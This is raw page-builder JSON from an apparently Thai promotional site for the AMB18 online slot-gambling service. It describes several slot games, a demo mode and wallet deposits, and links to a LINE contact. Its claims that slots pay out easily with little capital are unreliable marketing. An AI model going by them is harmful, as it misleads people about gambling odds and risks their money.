\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e22\\u0e37\\u0e14\\u0e2b\\u0e22\\u0e38\\u0e48\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1c\\u0e31\\u0e19\\u0e1c\\u0e27\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e25\\u0e47\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e25\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15 \\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e01\\u0e21\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e04\\u0e27\\u0e23\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e04\\u0e31\\u0e14\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e15\\u0e34\\u0e14\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e15\\u0e32\\u0e21\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e2a\\u0e23\\u0e23\\u0e1e\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e17\\u0e31\\u0e49\\u0e07\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e21\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>AMB18 <\\/b><b>\\u0e40\\u0e01\\u0e21 Wild West Gold <\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Wild West Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e17\\u0e35\\u0e48\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e34\\u0e1a \\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e17\\u0e34\\u0e28\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e34\\u0e22\\u0e21\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21 Bonanza Gold\\u00a0<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Bonanza Gold \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e07\\u0e17\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e08\\u0e32\\u0e01\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19 \\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e25\\u0e38\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e21\\u0e02\\u0e49\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e04\\u0e32\\u0e14\\u0e40\\u0e14\\u0e32\\u0e1c\\u0e25\\u0e25\\u0e31\\u0e1e\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21 The Dog House Megaways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">The Dog House Megaways \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e21\\u0e01\\u0e30\\u0e40\\u0e27\\u0e22\\u0e4c \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e08\\u0e33\\u0e19\\u0e27\\u0e19\\u0e27\\u0e34\\u0e18\\u0e35\\u0e0a\\u0e19\\u0e30\\u0e43\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e32\\u0e22\\u0e15\\u0e31\\u0e27 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2a\\u0e38\\u0e19\\u0e31\\u0e02\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e04\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1a\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e23\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2a\\u0e39\\u0e07 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e44\\u0e14\\u0e49\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e15\\u0e2d\\u0e1a\\u0e2a\\u0e19\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-1-1.webp\",\"id\":352,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e15\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e19\\u0e43\\u0e08\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e40\\u0e01\\u0e21\\u0e41\\u0e25\\u0e30\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e21\\u0e48\\u0e19\\u0e22\\u0e33\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e41\\u0e25\\u0e30\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e19\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e2b\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e21\\u0e32\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e08\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23 \\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e04\\u0e48\\u0e41\\u0e2d\\u0e14 <\\/span><a href=\\\"http:\\/\\/luca333line.com\\\"><b>\\u0e44\\u0e25\\u0e19\\u0e4c<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> 